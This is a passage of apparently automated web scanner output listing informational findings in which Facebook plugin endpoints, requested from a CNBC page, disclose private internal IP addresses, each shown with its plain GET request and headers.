19.902. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.100.27

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df407899f4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff324587f18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.903. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.250.33

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.904. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.252.43

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.905. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.113.103

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.906. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.181.106

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.907. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.90.58

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.908. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.233.59

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.909. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.29.39

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.910. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.211.31

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.911. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.182.55

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.912. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.35.38

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.913. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.226.41

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.914. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.123.56

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.915. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.36.61

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.916. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.69.55

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.917. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.236.62

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.918. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.179.65

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.919. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.59.31

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.920. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.229.35

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.921. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.196.45

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.922. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.173.40

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.923. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.191.43

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.924. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.208.37

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.925. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.252.36

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.926. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.137.55

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.927. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.204.37

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
